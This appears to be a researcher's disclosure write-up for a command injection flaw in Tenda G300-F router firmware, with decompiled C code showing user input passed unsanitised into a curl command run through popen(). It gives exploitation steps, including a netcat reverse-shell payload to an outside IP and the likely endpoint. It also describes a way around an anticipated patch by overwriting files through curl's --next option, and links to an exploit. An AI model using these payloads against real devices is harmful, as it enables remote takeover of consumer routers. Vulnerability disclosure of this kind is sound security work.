CVE-2026-25857

Summary: Tenda G300-F router firmware versions 16.01.14.2 and prior contain an OS command injection vulnerability in the WAN diagnostic functionality (formSetWanDiag). The implementation constructs a shell command that invokes curl and incorporates attacker-controlled input into the command line without adequate neutralization. As a result, a remote attacker with access to the affected management interface can inject additional shell syntax and execute arbitrary commands on the device with the privileges of the management process.

pending CVE-2026-25857

Tenda G300-F OSCI/parameter injection disclosure

the core vulnerability lies in the following code:

_int64 __fastcall cmd_get_http_code(const char *a1, const char *userbuffer, int a3)
{
  int v4; // s1
  int *v5; // a0
  char *v6; // a0
  __int64 v11; // [sp+20h] [-130h] BYREF
  char v12; // [sp+28h] [-128h] OVERLAPPED BYREF
  char v13; // [sp+30h] [-120h] BYREF
  FILE *v14; // [sp+128h] [-28h]

  v14 = 0LL;
  *(_QWORD *)&v12 = 0LL;
  memset(&v13, 0, 0xF8uLL);
  v11 = 0LL;
  if ( !a1 || !userbuffer )
    return 0LL;
  snprintf(
    &v12,
    256uLL,
    "curl --interface %s --max-time %d -w \"%%{http_code}\" -o /dev/null -skIL %s",
    a1,
    a3,
    userbuffer);
  v14 = popen(&v12, "r");

the code is a bit screwed; so i manually reversed it s.t. it is readable enough:

int cmd_get_http_code(const char *interface, const char *url, int timeout)
{
    int err;
    int *errno_ptr;
    char *error_str;
    long http_code;  
    char command_buffer[256];
    char output_buffer[8];
    FILE *pipe;

    pipe = 0;
    *(long long *)command_buffer = 0;
    memset(command_buffer + 8, 0, 248); // 8 bytes after old v12
    http_code = 0;
    if (!interface || !url)
        return 0;
    snprintf(
        command_buffer,
        256,
        "curl --interface %s --max-time %d -w \"%%{http_code}\" -o /dev/null -skIL %s",
        interface,
        timeout,
        url);
    pipe = popen(command_buffer, "r");
    if (pipe)
    // ... rest is not important

the core bug is really obvious from the popen() so ill leave it at that. to exploit, simply ensure a semicolon prepends your command: ; ls -aril or ; nc 192.168.1.67 1234 -e sh. trigger by formsetWanDiag, which i suspect is the endpoint /goform/setWanDiag. ill release an xp soon

evading their potential ‘patch’

judging by tenda’s prior patches on vulnerabilities, they’ll likely replace it with posix_spawn or a wrapper that does something equivalent. this doesnt neutralize the problem because we can still chain file writes with curl’s --next: --next {url} -o {outpath}, meaning we can overwrite files/cronjobs/etc.

exploit

you can get the xp here: https://github.com/eeeeeeeeeevan/CVE-2026-25857

if it is private still then that means the cve adv hasnt been published yet